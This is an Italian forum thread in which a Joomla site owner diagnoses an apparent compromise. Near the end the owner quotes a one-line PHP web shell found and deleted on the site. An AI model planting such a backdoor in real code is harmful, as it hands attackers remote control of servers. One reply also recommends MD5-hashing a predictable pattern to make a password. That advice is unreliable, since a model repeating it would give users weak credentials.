Joomla.it Forum
Non solo Joomla... => Sicurezza => : Haygin 01 Apr 2010, 11:25:15
-
Ciao a tutti, è la seconda volta (nel giro di 2 mesi) che mi spuntano fuori questi Notice sul sito:
Notice: Use of undefined constant HTTP_REFERER - assumed 'HTTP_REFERER' in /var/www/vhosts/suffritti.it/httpdocs/includes/defines.php(12) : eval()'d code on line 2
Notice: Undefined index: HTTP_REFERER in /var/www/vhosts/suffritti.it/httpdocs/includes/defines.php(12) : eval()'d code on line 2
Notice: Use of undefined constant HTTP_REFERER - assumed 'HTTP_REFERER' in /var/www/vhosts/suffritti.it/httpdocs/includes/defines.php(12) : eval()'d code on line 15
Notice: Undefined index: HTTP_REFERER in /var/www/vhosts/suffritti.it/httpdocs/includes/defines.php(12) : eval()'d code on line 15
Notice: Use of undefined constant HTTP_REFERER - assumed 'HTTP_REFERER' in /var/www/vhosts/suffritti.it/httpdocs/includes/defines.php(12) : eval()'d code on line 19
Notice: Undefined index: HTTP_REFERER in /var/www/vhosts/suffritti.it/httpdocs/includes/defines.php(12) : eval()'d code on line 19
Pensavo di aver risolto sostituendo il File " defines.php ", come suggerivano in un altro post, ma qui il problema si è ripresentato identico.
La versione di Joomla è la 1.5.15 (l'ultima) e OzioGallery è all'ultima versione disponibile.. insomma il sito è aggiornato.
Come posso risolvere questo problema?
Ho letto che potrebbero aver bucato il sito.. come posso evitarlo?
grazie
-
ciao Haygin,
se hanno bucato il sito una volta non è detto che abbiano modificato solo il file in questione, dai un occhiata anche a questo post:
http://forum.joomla.it/index.php/topic,99296.msg438655.html#msg438655
comincia a verificare che non ci siano files che non dovrebbero esserci.
poi ti consiglio questa lettura: docs.joomla.org/Category:Security_Checklist
ciao,
marco
-
Grazie mille per l'aiuto! verificherò! :)
-
Ci sono cartelle (molte) che in Joomla non vengono MAI modificate e non contemplano l'aggiunta di nulla.
Tenere un bell'md5 di quelle cartelle significa capire al volo dove è stata apportata qualche modifica.
Ci dovrebbero essere anche delle addons che fanno questo.
M.
-
md5? perdona l'ignoranza ma puoi spiegarmi cos'è?
Che cosa mi consiglieresti come componente aggiuntivo?
Ti ringrazio :)
-
sono sempre per il consigliare di installare ... nulla :)
nel senso che ognuno dovrebbe ricorrere a "stratagemmi" personali per avere sotto controllo la situazione, e serve molto di più la fantasia che le conoscenze informatiche.
Files e cartelle, ad esempio, riportano sempre la data dell'ultima modifica, che dovrà risultare quella dell'ultima installazione.
Questo però ad esclusione di cartelle e files che vengono modificati... esempio una cartella templates o images non ha senso monitorarla così poichè subisce continue modifiche... ma un file define quante volte viene modificato? ... credo mai.
anche administrator si modifica solo se installi qualcosa e così pure le cartelle components modules etc.
questo quello che ti dicevo (ma è solo un modo):
http://www.pcpercaso.com/sicurezza-strumenti/64-md5-checksum.html
Un'altro uso dell'md5 può essere questo:
Se ti viene comodo usare delle password semplici o comunque irrobustire quelle che hai già è molto pratico.
posso costruirmi uno schema "mentale" con cui la mia pw semplice diventa complicata.
esempio: voglio usare pippo
TUTTE le mie password avranno un # che le precede e un _ che le segue, quindi diventa:
#pippo_
ora, è troppo intuibile e con un banale bruteforce salterebbe subito, quindi ricorro all'md5, la mia password sarà:
md5(#pippo_) che risulterà -> cb2ea4f18aaff879a109af70e2103ae4
...un bel po' più complicata no?
... ma il mio sforzo sarà solo quello di ricordare pippo.
M.
ps controlla tutti i files index siano essi html o php, vedrai che trovi altre sorprese.
-
Ho controllato i files e infatti ho trovato un post.php e un post.php.fuck con all'interno la riga:
<?php
eval (base64_decode($_POST["php"]));
?>
MALEDETTI!!!!
Ora li ho cancellati, cambiate tutte le password (le ho fatte belle lunghe con lettere, numeri, punti, trattini e virgole) e ho cambiato i permessi di alcune cartelle settandoli su 755... speriamo che basti.
Ti ringrazio per l'aiuto!!!! :D